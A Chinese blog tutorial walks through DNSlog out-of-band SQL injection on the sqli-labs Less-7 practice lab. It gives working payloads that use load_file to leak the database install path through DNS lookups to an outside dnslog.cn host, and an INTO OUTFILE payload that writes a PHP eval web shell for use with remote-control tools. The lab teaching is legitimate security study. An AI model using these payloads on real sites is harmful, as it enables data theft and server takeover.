DNSlog注入思路

最新推荐文章于 2023-12-10 06:29:09 发布
最新推荐文章于 2023-12-10 06:29:09 发布
阅读量533 收藏
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47912094/article/details/119739518
版权

之前看到的思路今天来整整^^;
dnslog网址:http://www.dnslog.cn/

拿我们熟悉的sqli-labs,第7关来开刀^^;
在这里插入图片描述
正常显示:
在这里插入图片描述
错误显示:
在这里插入图片描述
猜测到注入点是字符型,单引号加两个小括号,?id=1’))
在这里插入图片描述

OK那接下来在用dnslog之前得看一下mysql中secure_file_priv变量得值;
因为配置值不同会产生影响:
在这里插入图片描述
修改这个变量值可以通过my.ini去进行修改,如果my.ini没有这个变量自行加上即可。
修改完记得重启然后检查一下是否修改成功:
在这里插入图片描述
接下来就可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击。
构造payload:
在这里插入图片描述
虽然执行完页面还是会显示报错,但不影响获取结果:
在这里插入图片描述
拿完库名接下来的表名等自行修改即可。

还可以通过dnslog 来获取文件路径:
构造payload为:
http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),1,30)),’.umgkxt.dnslog.cn\coke’)) --+

http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),31,30)),’.umgkxt.dnslog.cn\coke’)) --+

在这里插入图片描述
然后拼接起来十六进制解码得出:
在这里插入图片描述
在这里插入图片描述
获取到文件路径可以进行写入文件了;
构造语句:?id=-1’)) union select 1,2,’<?php @eval($_REQUEST[coke])?>’ into outfile ‘D:\phpstudy\phpstudy_pro\WWW\99.php’ --+
来到网站目录下,发现写入成功:在这里插入图片描述
也可以使用into dumpfile来写入;
然后通过菜刀,蚁剑等工具进行连接即可。

CoOlCoKeZ
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 235
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
dnslog server
09-08
dnslog server
DNSLog使用笔记
糖小喵
09-27 5128
首先DNSlog网址:http://www.dnslog.cn/ 一般用作回显,这里会记录请求,也就是记录DNS访问记录的东西,同样在局域网可用http服务。
阿里云域名搭建DNSLOG
qq_36226141的博客
07-19 2488
阿里云域名搭建DNSLOG
好用的dnslog在线平台
热门推荐
siu~
08-21 1万+
dnslog在线平台分享
【渗透测试工具分享】【dnslog服务器搭建指导】
一个程序员
07-16 4166
dnslog服务器
dnslog.cn的使用
weixin_43622525的博客
12-04 8575
网站首页 1点击 Get SubDomain 2复制1x7ojc.dnslog.cn 3打开cmd命令行 4输入nslookup1x7ojc.dnslog.cn 5回到dnslog.cn点击Refresh Record 总结: 用来判断是否可以连接外网
深度剖析DNSLog注入原理&本地实例测试
monster663的博客
02-08 5863
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 Dns_log注入简介 我们将利用DNS解析的过程将留下痕迹和mysql中load_file()函数的能够访问互联网中的文件这一特点,将一些渗透的过程中将我们需要测试网站的结果回显到一个特定的可以记录DNS日志网站中,关于DNS的原理请参考https://blog.csdn.net/king9666/article/details/106022050 应用场景 DNS_log注入常用于网站对
DNSLog漏洞探测(二)之常用DNSLog平台
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 2980
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台DNSLog平台非常的多,但是实际上大部分的DNSLog平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
DNSlog
遇事不决冲冲冲
08-08 9178
什么是DNSlog DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。 原理 payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog平台上,通过读取这些解析的日志,来获取信息。 使用方法 通过Burp Suite 通过在线平台 http://www.dnslog.cn/ http://ceye.io/ 利用场景 执行命令时没
dnslog是怎么被黑客利用的
ningyanggege的博客
09-09 3713
dnslog
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键...
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
dnslog:简约的 DNS 日志记录工具
05-31
捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192....
DNSlog-GO:DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口
03-08
简介DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口安装详细图文教程: : 1.获取发行版这里下载最新发行版,并解压2.域名与公网IP准备搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS ...
mysql dnslog_DNSLOG | 利用总结
weixin_42298352的博客
01-27 507
0x00 写这篇博客的原因是wb在线的面试中无回显rce的问题在这里填了这个坑0x10 下面是几个常用的dnslog平台1 http://ceye.io/2 http://www.dnslog.cn/3 https://github.com/BugScanTeam/DNSLog(开源可自行搭建的平台)0x20 dnslog平台的作用现在很多漏洞都没有办法去回显,可是我们的payload已经执行,...
DNSlog使用
weixin_48000706的博客
07-31 1166
【代码】DNSlog使用。
渗透中常用的在线工具和网站总结
m0_60571990的博客
12-04 484
渗透中常用的在线工具和网站总结
搭建dnslog、weblog平台
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
09-26 6235
文章目录a、前期准备b、搭建 渗透测试的时候,对于命令注入、反序列化等无回显漏洞,dnslog或者weblog是一个必不可少的平台。 不想搭建,可使用免费版:http://dnslog.cn/,不过有时效限制 下面是我的搭建过程,由于使用了别人做好的docker,所以总体搭建过程较为简单。 a、前期准备 一个公网服务器,一个域名(有的教程说要两个域名,一个足够了),我这里买的都是最低端的,一年总共也就一百来块,足够用了。 下面是我的域名配置: 配置A记录,子域名ns1,解析到 7.7.7.7(你买的公网i
dnslog注入原理
07-29
DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值